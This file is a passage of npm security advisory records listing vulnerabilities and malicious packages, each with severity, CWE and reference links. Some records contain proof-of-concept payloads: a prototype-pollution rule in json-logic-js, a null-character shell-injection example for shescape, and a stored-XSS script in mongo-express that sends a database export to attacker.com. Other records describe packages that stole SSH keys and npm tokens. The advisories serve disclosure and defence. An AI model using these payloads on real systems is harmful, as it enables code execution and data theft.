Upgrade to version 4.44.4 or later.
| null |
2020-08-31T18:48:48Z
|
2020-09-03T20:25:33Z
|
MODERATE
| null | null |
{'https://www.npmjs.com/advisories/1142', 'https://github.com/sequelize/sequelize/pull/11877'}
| null |
npm
|
GHSA-jppx-hw2f-8gx4
|
Downloads Resources over HTTP in chromedriver126
|
Affected versions of `chromedriver126` insecurely download an executable over an unencrypted HTTP connection.
In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `chromedriver126`.
## Recommendation
No patch is currently available for this vulnerability.
The best mitigation is currently to avoid using this package, using a different package if available.
Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.
|
{'CVE-2016-10609'}
|
2021-01-08T18:32:35Z
|
2019-02-18T23:33:30Z
|
HIGH
| null |
{'CWE-311'}
|
{'https://nodesecurity.io/advisories/203', 'https://github.com/advisories/GHSA-jppx-hw2f-8gx4', 'https://www.npmjs.com/advisories/203', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10609'}
| null |
npm
|
GHSA-m9hw-7xfv-wqg7
|
Prototype Pollution in json-logic-js
|
Versions of json-logic-js prior to 2.0.0 are vulnerable to Prototype Pollution. The method operation allows a malicious user to modify the prototype of Object through the method property name. This causes modification of any existing property that will exist on all objects and leads to Remote Code Execution.
The following rule creates a popup when run from a browser:
```
{
"method": [
{
"method": [
{
"var": "__proto__.constructor.is.__proto__"
},
"constructor",
[
"var x = 'SECURITY!'; console.log(x, window.fetch); alert(x)"
]
]
},
"call"
]
}
```
| null |
2020-11-12T19:35:53Z
|
2020-11-12T19:36:14Z
|
HIGH
| null |
{'CWE-471'}
|
{'https://github.com/jwadhams/json-logic-js/commit/fadfa5dc7ccd1cc5c9a1900a97a15af390bf642b', 'https://www.npmjs.com/package/json-logic-js', 'https://www.npmjs.com/advisories/1542'}
| null |
npm
|
GHSA-9p47-w5xp-f4xr
|
Downloads Resources over HTTP in windows-build-tools
|
Affected versions of `windows-build-tools` insecurely download an executable over an unencrypted HTTP connection.
In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `windows-build-tools`.
## Recommendation
Update to version 1.0.0 or later.
|
{'CVE-2017-16003'}
|
2021-01-08T19:03:25Z
|
2018-11-09T17:48:37Z
|
HIGH
| null |
{'CWE-311'}
|
{'https://github.com/felixrieseberg/windows-build-tools/commit/9835d33e68f2cb5e4d148e954bb3ed0221d98e90', 'https://nodesecurity.io/advisories/304', 'https://github.com/advisories/GHSA-9p47-w5xp-f4xr', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16003', 'https://github.com/felixrieseberg/windows-build-tools/commit/9835d33e68f2cb5e4d148e954bb3ed0221d98e90)', 'https://www.npmjs.com/advisories/304'}
| null |
npm
|
GHSA-hjp8-2cm3-cc45
|
Cookie exposure in requestretry
|
Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository fgribreau/node-request-retry prior to 7.0.0 via cookies being leaked to external sites.
|
{'CVE-2022-0654'}
|
2022-03-03T22:02:13Z
|
2022-02-24T00:00:54Z
|
HIGH
| null |
{'CWE-200'}
|
{'https://huntr.dev/bounties/a779faf5-c2cc-48be-a31d-4ddfac357afc', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0654', 'https://github.com/fgribreau/node-request-retry/commit/0979c6001d9d57c2aac3157c11b007397158922a'}
| null |
npm
|
GHSA-hwcf-pp87-7x6p
|
Moderate severity vulnerability that affects ejs
|
nodejs ejs version older than 2.5.5 is vulnerable to a Cross-site-scripting in the ejs.renderFile() resulting in code injection
|
{'CVE-2017-1000188'}
|
2021-09-14T17:32:09Z
|
2017-11-30T23:15:05Z
|
MODERATE
| null |
{'CWE-79'}
|
{'http://www.securityfocus.com/bid/101889', 'https://github.com/advisories/GHSA-hwcf-pp87-7x6p', 'https://nvd.nist.gov/vuln/detail/CVE-2017-1000188', 'https://github.com/mde/ejs/commit/49264e0037e313a0a3e033450b5c184112516d8f', 'https://github.com/mde/ejs'}
| null |
npm
|
GHSA-66rh-8fw6-59q6
|
Prototype Pollution in assign-deep
|
Versions of `assign-deep` prior to 1.0.1 are vulnerable to Prototype Pollution. The `assign` function fails to validate which Object properties it updates. This allows attackers to modify the prototype of Object, causing the addition or modification of an existing property on all objects.
## Recommendation
Upgrade to version 1.0.1 or later.
|
{'CVE-2019-10745'}
|
2021-07-27T21:04:17Z
|
2019-08-21T16:15:13Z
|
HIGH
| null |
{'CWE-915', 'CWE-20'}
|
{'https://www.npmjs.com/advisories/1014', 'https://nvd.nist.gov/vuln/detail/CVE-2019-10745', 'https://snyk.io/vuln/SNYK-JS-ASSIGNDEEP-450211'}
| null |
npm
|
GHSA-h9wr-xr4r-66fh
|
Cross-Site Scripting in dmn-js-properties-panel
|
Versions of `dmn-js-properties-panel` prior to 0.8.0 are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize input in specially configured diagrams, which may allow attackers to inject arbitrary JavaScript in the embedding website.
## Recommendation
Upgrade to version 0.3.0 or later.
| null |
2020-08-31T18:46:37Z
|
2020-09-03T18:20:20Z
|
HIGH
| null |
{'CWE-79'}
|
{'https://www.npmjs.com/advisories/1081'}
| null |
npm
|
GHSA-h96f-fc7c-9r55
|
Regex denial of service vulnerability in codesample plugin
|
### Impact
A regex denial of service (ReDoS) vulnerability was discovered in a dependency of the `codesample` plugin. The vulnerability allowed poorly formed ruby code samples to lock up the browser while performing syntax highlighting. This impacts users of the `codesample` plugin using TinyMCE 5.5.1 or lower.
### Patches
This vulnerability has been patched in TinyMCE 5.6.0 by upgrading to a version of the dependency without the vulnerability.
### Workarounds
To work around this vulnerability, either:
- Upgrade to TinyMCE 5.6.0 or higher
- Disable the `codesample` plugin
- Disable ruby code samples using the [codesample_languages](https://www.tiny.cloud/docs/plugins/opensource/codesample/#exampleusingcodesample_languages) setting
- Override the PrismJS syntax highlighter to version 1.21.0 or higher using the [codesample_global_prismjs](https://www.tiny.cloud/docs/plugins/opensource/codesample/#codesample_global_prismjs) setting
### Acknowledgements
Tiny Technologies would like to thank Erik Krogh Kristensen at GitHub for discovering this vulnerability.
### References
https://www.tiny.cloud/docs/release-notes/release-notes56/#securityfixes
### For more information
If you have any questions or comments about this advisory:
* Open an issue in the [TinyMCE repo](http://github.com/tinymce/tinymce/issues)
* Email us at [infosec@tiny.cloud](mailto:infosec@tiny.cloud)
| null |
2021-01-06T19:25:24Z
|
2021-01-06T19:25:46Z
|
LOW
| null |
{'CWE-400'}
|
{'https://github.com/tinymce/tinymce/security/advisories/GHSA-h96f-fc7c-9r55', 'https://www.tiny.cloud/docs/release-notes/release-notes56/#securityfixes', 'https://www.npmjs.com/package/tinymce'}
| null |
npm
|
GHSA-9hc2-w9gg-q6jw
|
Malicious Package in boogeyman
|
All versions of `boogeyman` are considered malicious. This particular package would download a payload from pastebin.com, eval it to read ssh keys and the users `.npmrc` and send them to a private pastebin account.
## Recommendation
This package was published to the npm Registry for a very short period of time. If you happen to find it in your environment you should revoke and rotate your ssh keys and your npm token.
| null |
2021-10-01T13:28:13Z
|
2020-09-01T21:07:41Z
|
CRITICAL
| null |
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/677'}
| null |
npm
|
GHSA-mfc2-93pr-jf92
|
Malicious code in `loadyaml`
|
npm packages `loadyaml` and `electorn` were removed from the npm registry for containing malicious code. Upon installation the package runs a preinstall script that writes a public comment on GitHub containing the following information:
- IP and IP-based geolocation
- home directory name
- local username
The malicious packages have been removed from the npm registry and the leaked content removed from GitHub.
| null |
2020-10-01T17:09:29Z
|
2020-10-01T17:10:15Z
|
CRITICAL
| null |
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/1563'}
| null |
npm
|
GHSA-f2rp-38vg-j3gh
|
Null characters not escaped
|
### Impact
Anyone using _Shescape_ to defend against shell injection may still be vulnerable against shell injection if the attacker manages to insert a [null character](https://en.wikipedia.org/wiki/Null_character) into the payload. For example (on Windows):
```javascript
const cp = require("child_process");
const shescape = require("shescape");
const nullChar = String.fromCharCode(0);
const payload = "foo\" && ls -al ${nullChar} && echo \"bar";
console.log(cp.execSync(`echo ${shescape.quote(payload)}`));
// foototal 3
// drwxr-xr-x 1 owner XXXXXX 0 Mar 13 18:44 .
// drwxr-xr-x 1 owner XXXXXX 0 Mar 13 00:09 ..
// drwxr-xr-x 1 owner XXXXXX 0 Mar 13 18:42 folder
// -rw-r--r-- 1 owner XXXXXX 0 Mar 13 18:42 file
```
### Patches
The problem has been patched in [v1.1.3](https://github.com/ericcornelissen/shescape/releases/tag/v1.1.3) which you can upgrade to now. No further changes are required.
### Workarounds
Alternatively, null characters can be stripped out manually using e.g. `arg.replace(/\u{0}/gu, "")`
|
{'CVE-2021-21384'}
|
2021-03-18T23:43:39Z
|
2021-03-18T23:47:56Z
|
HIGH
| null |
{'CWE-88'}
|
{'https://github.com/ericcornelissen/shescape/releases/tag/v1.1.3', 'https://github.com/ericcornelissen/shescape/commit/07a069a66423809cbedd61d980c11ca44a29ea2b', 'https://github.com/ericcornelissen/shescape/security/advisories/GHSA-f2rp-38vg-j3gh', 'https://www.npmjs.com/package/shescape', 'https://nvd.nist.gov/vuln/detail/CVE-2021-21384'}
| null |
npm
|
GHSA-h24f-9mm4-w336
|
Cross-site Scripting (XSS) - Stored in crud-file-server
|
Versions of `crud-file-server` before 0.8.0 are vulnerable to stored cross-site scripting (XSS). This is due to insufficient santiziation of filenames when directory index is served by `crud-file-server`.
## Recommendation
Update to version 0.8.0 or later.
|
{'CVE-2018-3726'}
|
2020-08-31T18:28:12Z
|
2018-07-18T18:34:27Z
|
CRITICAL
| null |
{'CWE-79'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2018-3726', 'https://github.com/omphalos/crud-file-server/commit/4155bfe068bf211b49a0b3ffd06e78cbaf1b40fa', 'https://www.npmjs.com/advisories/570', 'https://github.com/advisories/GHSA-h24f-9mm4-w336', 'https://hackerone.com/reports/311101'}
| null |
npm
|
GHSA-whv6-rj84-2vh2
|
Cross-Site Scripting in nextcloud-vue-collections
|
Versions of `nextcloud-vue-collections` prior to 0.4.2 are vulnerable to Cross-Site Scripting (XSS). The `v-tooltip` component has an insecure `defaultHTML` configuration that allows arbitrary JavaScript to be injected in the tooltip of a collection item. This allows attackers to execute arbitrary code in a victim's browser.
## Recommendation
Upgrade to version 0.4.2 or later.
| null |
2021-10-04T20:36:41Z
|
2020-09-04T17:21:58Z
|
HIGH
| null |
{'CWE-79'}
|
{'https://www.npmjs.com/advisories/1442', 'https://github.com/juliushaertl/nextcloud-vue-collections', 'https://github.com/juliushaertl/nextcloud-vue-collections/commit/8ec1fca214f003538cec4137792ede928f25f583'}
| null |
npm
|
GHSA-p2c4-gxp4-j3xp
|
Denial of service in Valine
|
Valine is a fast, simple & powerful comment system. Valine 1.4.14 allows remote attackers to cause a denial of service (application outage) by supplying a ua (aka User-Agent) value that only specifies the product and version.
|
{'CVE-2021-34801'}
|
2022-05-04T03:11:25Z
|
2021-06-21T17:11:25Z
|
MODERATE
| null |
{'CWE-94'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2021-34801', 'https://github.com/xCss/Valine/issues/366', 'https://github.com/xCss/Valine'}
| null |
npm
|
GHSA-3xc7-xg67-pw99
|
Sensitive Data Exposure in sequelize-cli
|
Versions of `sequelize-cli` prior to 5.5.0 are vulnerable to Sensitive Data Exposure. The function `filteredURL()` does not properly sanitize the `config.password` value which may cause passwords with special characters to be logged in plain text.
## Recommendation
Upgrade to version 5.5.0 or later.
| null |
2021-08-04T20:54:45Z
|
2019-06-05T20:43:10Z
|
LOW
| null |
{'CWE-532'}
|
{'https://github.com/sequelize/cli/pull/722', 'https://github.com/sequelize/cli/issues/172', 'https://snyk.io/vuln/SNYK-JS-SEQUELIZECLI-174320', 'https://www.npmjs.com/advisories/825', 'https://github.com/FelixLC/cli/commit/da59652c061a798282e18efad0b6d0afefa15465'}
| null |
npm
|
GHSA-4f6x-49g2-99fm
|
Cross-site Scripting in Mermaid
|
Mermaid before 8.11.0 allows XSS when the antiscript feature is used.
|
{'CVE-2021-35513'}
|
2021-07-02T16:59:18Z
|
2021-12-10T18:57:41Z
|
MODERATE
| null |
{'CWE-79'}
|
{'https://github.com/mermaid-js/mermaid/releases/tag/8.11.0-rc2', 'https://github.com/mermaid-js/mermaid/pull/2123/commits/3d22fa5d2435de5acc18de6f88474a6e8675a60e', 'https://github.com/mermaid-js/mermaid/issues/2122', 'https://nvd.nist.gov/vuln/detail/CVE-2021-35513', 'https://github.com/mermaid-js/mermaid/pull/2123'}
| null |
npm
|
GHSA-jcw8-r9xm-32c6
|
Command Injection in dns-sync
|
Affected versions of `dns-sync` have an arbitrary command execution vulnerability in the `resolve()` method.
## Recommendation
- Use an alternative dns resolver
- Do not allow untrusted input into `dns-sync.resolve()`
|
{'CVE-2017-16100'}
|
2020-08-31T18:26:20Z
|
2018-07-18T18:28:02Z
|
CRITICAL
| null |
{'CWE-94'}
|
{'https://github.com/skoranga/node-dns-sync/issues/1', 'https://www.npmjs.com/advisories/523', 'https://nodesecurity.io/advisories/523', 'https://github.com/skoranga/node-dns-sync/commit/d9abaae384b198db1095735ad9c1c73d7b890a0d', 'https://github.com/advisories/GHSA-jcw8-r9xm-32c6', 'https://github.com/skoranga/node-dns-sync/issues/1)', 'https://github.com/skoranga/node-dns-sync/issues/5', 'https://www.npmjs.com/advisories/153', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16100', 'https://github.com/skoranga/node-dns-sync/commit/d9abaae384b198db1095735ad9c1c73d7b890a0d)))'}
| null |
npm
|
GHSA-4xf9-pgvv-xx67
|
Regular Expression Denial of Service in simple-markdown
|
Versions of `simple-markdown` prior to 0.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS). The `SimpleMarkdown.defaultInlineParse()` function has significantly degraded performance when parsing inline code blocks.
## Recommendation
Upgrade to version 0.5.2 or later.
| null |
2021-09-29T18:16:33Z
|
2020-09-03T20:27:46Z
|
MODERATE
| null |
{'CWE-400'}
|
{'https://github.com/Khan/simple-markdown', 'https://www.npmjs.com/advisories/1147', 'https://snyk.io/vuln/SNYK-JS-SIMPLEMARKDOWN-460540', 'https://github.com/Khan/simple-markdown/issues/71'}
| null |
npm
|
GHSA-pj7m-g53m-7638
|
Moderate severity vulnerability that affects bootstrap
|
In Bootstrap before 4.1.2, XSS is possible in the data-target property of scrollspy. This is similar to CVE-2018-14042.
|
{'CVE-2018-14041'}
|
2021-06-15T16:33:23Z
|
2018-09-13T15:49:56Z
|
MODERATE
| null |
{'CWE-79'}
|
{'https://lists.apache.org/thread.html/r3dc0cac8d856bca02bd6997355d7ff83027dcfc82f8646a29b89b714@%3Cissues.hbase.apache.org%3E', 'https://github.com/advisories/GHSA-pj7m-g53m-7638', 'https://github.com/twbs/bootstrap/issues/26627', 'https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E', 'http://seclists.org/fulldisclosure/2019/May/13', 'https://lists.apache.org/thread.html/52e0e6b5df827ee7f1e68f7cc3babe61af3b2160f5d74a85469b7b0e@%3Cdev.superset.apache.org%3E', 'http://seclists.org/fulldisclosure/2019/May/10', 'https://github.com/twbs/bootstrap/pull/26630', 'https://seclists.org/bugtraq/2019/May/18', 'https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E', 'https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E', 'http://seclists.org/fulldisclosure/2019/May/11', 'https://github.com/twbs/bootstrap/issues/26423', 'http://packetstormsecurity.com/files/152787/dotCMS-5.1.1-Vulnerable-Dependencies.html', 'https://blog.getbootstrap.com/2018/07/12/bootstrap-4-1-2/', 'https://www.oracle.com/security-alerts/cpuApr2021.html', 'http://packetstormsecurity.com/files/156743/OctoberCMS-Insecure-Dependencies.html', 'https://nvd.nist.gov/vuln/detail/CVE-2018-14041', 'https://access.redhat.com/errata/RHSA-2019:1456'}
| null |
npm
|
GHSA-8whr-v3gm-w8h9
|
Command Injection in node-rules
|
Versions of `node-rules` prior to 5.0.0 are vulnerable to Command Injection. The package fails to sanitize input rules and passes it directly to an `eval` call when using the `fromJSON` function. This may allow attackers to execute arbitrary code in the system if the rules are user-controlled.
## Recommendation
Upgrade to version 5.0.0 or later.
| null |
2021-10-04T21:08:30Z
|
2020-09-03T15:51:04Z
|
HIGH
| null |
{'CWE-78'}
|
{'https://www.npmjs.com/advisories/1499', 'https://github.com/mithunsatheesh/node-rules/issues/84', 'https://github.com/mithunsatheesh/node-rules', 'https://snyk.io/vuln/SNYK-JS-NODERULES-560426'}
| null |
npm
|
GHSA-g5q2-fcg9-j526
|
Malicious Package in hsf-clients
|
All versions of `hsf-clients` contain malicious code. The package uploads system information to a remote server, downloads a file and executes it.
## Recommendation
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
| null |
2021-09-30T19:46:50Z
|
2020-09-03T17:40:18Z
|
CRITICAL
| null |
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/1054'}
| null |
npm
|
GHSA-hrpp-f84w-xhfg
|
Outdated Static Dependency in vue-moment
|
Versions of `vue-moment` prior to 4.1.0 contain an Outdated Static Dependency. The package depends on `moment` and has it loaded statically instead of as a dependency that can be updated. It has `moment@2.19.1` that contains a Regular Expression Denial of Service vulnerability.
## Recommendation
Upgrade to version 4.1.0 or later.
| null |
2021-10-04T19:13:23Z
|
2020-09-04T16:55:06Z
|
MODERATE
| null |
{'CWE-1104'}
|
{'https://snyk.io/vuln/SNYK-JS-VUEMOMENT-538934', 'https://www.npmjs.com/advisories/532', 'https://github.com/brockpetrie/vue-moment/commit/a265e54660a7181a6795a12a97cebac5b305746e', 'https://www.npmjs.com/advisories/1425', 'https://github.com/brockpetrie/vue-moment'}
| null |
npm
|
GHSA-whrh-9j4q-g7ph
|
CSRF Vulnerability in polaris-website
|
### Impact
CSRF vulnerability:
In some very specific circumstances, an attacker would be able to update your settings.
Basically you would need to navigate to hackersite.com while logged into our panel. Then they could modify your settings. They couldn't check if it worked, nor could they read your settings.
### Patches
As of v1.1.1 this has been patched by implementing the Double submit pattern using a cookie.
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Polaris-React](https://github.com/polaris-rbx/polaris-react)
* Email us at [hi@nezto.re](mailto:hi@nezto.re)
* Join our discord (preferred): https://discord.gg/QevWabU
| null |
2021-09-23T18:38:11Z
|
2020-08-05T21:43:19Z
|
MODERATE
| null |
{'CWE-352'}
|
{'https://owasp.org/www-community/attacks/csrf', 'https://github.com/polaris-rbx/Polaris-React/commit/b64673d91e83c0737616a0770d8208727730808b', 'https://github.com/polaris-rbx/Polaris-React/security/advisories/GHSA-whrh-9j4q-g7ph', 'https://www.barracuda.com/glossary/csrf', 'https://snyk.io/vuln/SNYK-JS-POLARISWEBSITE-597473', 'https://medium.com/cross-site-request-forgery-csrf/double-submit-cookie-pattern-65bb71d80d9f', 'https://github.com/polaris-rbx/Polaris-React'}
| null |
npm
|
GHSA-pp4v-55vr-9gxh
|
Regular Expression Denial of Service in riot-compiler
|
Affected versions of `riot-compiler` are susceptible to a regular expression denial of service vulnerability.
## Recommendation
Update to version 2.3.22 or later.
|
{'CVE-2016-10527'}
|
2020-08-31T18:10:18Z
|
2019-02-18T23:39:13Z
|
MODERATE
| null |
{'CWE-400'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2016-10527', 'https://github.com/advisories/GHSA-pp4v-55vr-9gxh', 'https://github.com/riot/compiler/issues/46', 'https://nodesecurity.io/advisories/86', 'https://www.npmjs.com/advisories/86'}
| null |
npm
|
GHSA-v4rh-8p82-6h5w
|
Regular expression denial of service in url-regex
|
all versions of url-regex are vulnerable to Regular Expression Denial of Service. An attacker providing a very long string in String.test can cause a Denial of Service.
|
{'CVE-2020-7661'}
|
2021-09-22T18:35:57Z
|
2020-06-22T14:39:03Z
|
HIGH
| null |
{'CWE-400'}
|
{'https://snyk.io/vuln/SNYK-JS-URLREGEX-569472', 'https://github.com/kevva/url-regex', 'https://github.com/kevva/url-regex/issues/70', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7661'}
| null |
npm
|
GHSA-7p8h-86p5-wv3p
|
Cross-site scripting
|
Two kinds of XSS were found:
1. As mentioned in https://github.com/mongo-express/mongo-express/issues/577 when the content of a cell grows larger than supported size, clicking on a row will show full document unescaped, however this needs admin interaction on cell.
2. Data cells identified as media will be rendered as media, without being sanitized. Example of different renders: image, audio, video, etc.
### Impact
As an example of type 1 attack, an unauthorized user who only can send a large amount of data in a field of a document may use this payload:
```JSON
{"someField": "long string here to surpass the limit of document ...... <script> await fetch('http://localhost:8081/db/testdb/export/users').then( async res => await fetch('http://attacker.com?backup='+encodeURIComponent((await res.text())))) </script>" }
```
This will send an export of a collection to the attacker without even admin knowing. Other types of attacks such as dropping a database\collection are also possible.
### Patches
Upgrade to `v1.0.0-alpha.4`
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [mongo-express](https://github.com/mongo-express/mongo-express/issues/new)
* Email me at [jafar.akhoondali@gmail.com](mailto:jafar.akhoondali@gmail.com)
|
{'CVE-2021-21422'}
|
2021-06-22T15:44:45Z
|
2021-06-28T17:18:04Z
|
HIGH
| null |
{'CWE-79'}
|
{'https://github.com/mongo-express/mongo-express/issues/577', 'https://github.com/mongo-express/mongo-express/commit/f5e0d4931f856f032f22664b5e5901d5950cfd4b', 'https://github.com/mongo-express/mongo-express/security/advisories/GHSA-7p8h-86p5-wv3p', 'https://nvd.nist.gov/vuln/detail/CVE-2021-21422'}
| null |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.